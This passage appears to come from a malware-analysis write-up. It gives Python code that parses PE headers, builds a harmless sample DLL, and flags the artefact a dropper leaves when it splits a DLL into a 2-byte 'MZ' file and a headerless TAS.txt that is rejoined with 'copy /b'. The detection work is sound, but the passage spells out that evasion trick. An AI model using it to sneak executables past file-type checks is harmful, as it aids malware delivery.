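    """Return (e_lfanew, machine, sections) if data is a well-formed PE, else None."""
    if len(data) < 0x40 or data[:2] != MZ:
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]     # IMAGE_DOS_HEADER.e_lfanew
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != PE_SIG:
        return None
    machine, sections = struct.unpack_from("<HH", data, e_lfanew + 4)  # IMAGE_FILE_HEADER
    return e_lfanew, machine, sections


def is_pe(data):
    return pe_headers(data) is not None


def copy_b(*parts):
    """Binary concatenation: exactly what 'copy /b a+b c' writes to c."""
    return b"".join(parts)


def is_headerless_pe(body):
    """True if body is a PE whose 2-byte 'MZ' magic was cut off (the TAS.txt layout)."""
    return not is_pe(body) and is_pe(MZ + body)


def make_sample_pe(machine=0x014C, sections=3):
    """Constructed stand-in for the DLL: a DOS header whose e_lfanew points at a COFF header."""
    dos = bytearray(0x40)
    dos[:2] = MZ
    struct.pack_into("<I", dos, 0x3C, 0x40)              # PE header directly after the DOS header
    coff = PE_SIG + struct.pack("<HHIIIHH", machine, sections, 0, 0, 0, 0, 0)
    return bytes(dos) + coff + b"\0" * 16


if __name__ == "__main__":
    dll = make_sample_pe()
    mz_txt, tas_txt = dll[:2], dll[2:]                   # the two dropped pieces
    print("TAS.txt alone is a PE:", is_pe(tas_txt))
    print("TAS.txt is a headerless PE:", is_headerless_pe(tas_txt))
    print("rebuilt headers:", pe_headers(copy_b(mz_txt, tas_txt)))
```

The is_headerless_pe check is cheap enough to run over every dropped file in a triage pipeline: a file that fails the PE check but passes once MZ is prepended is exactly the artefact this dropper leaves behind, and the 2-byte companion file (MD5 ac6ad5d9b99757c3a878f2d275ace198 in the list above, the hash of the string "MZ") is its signature.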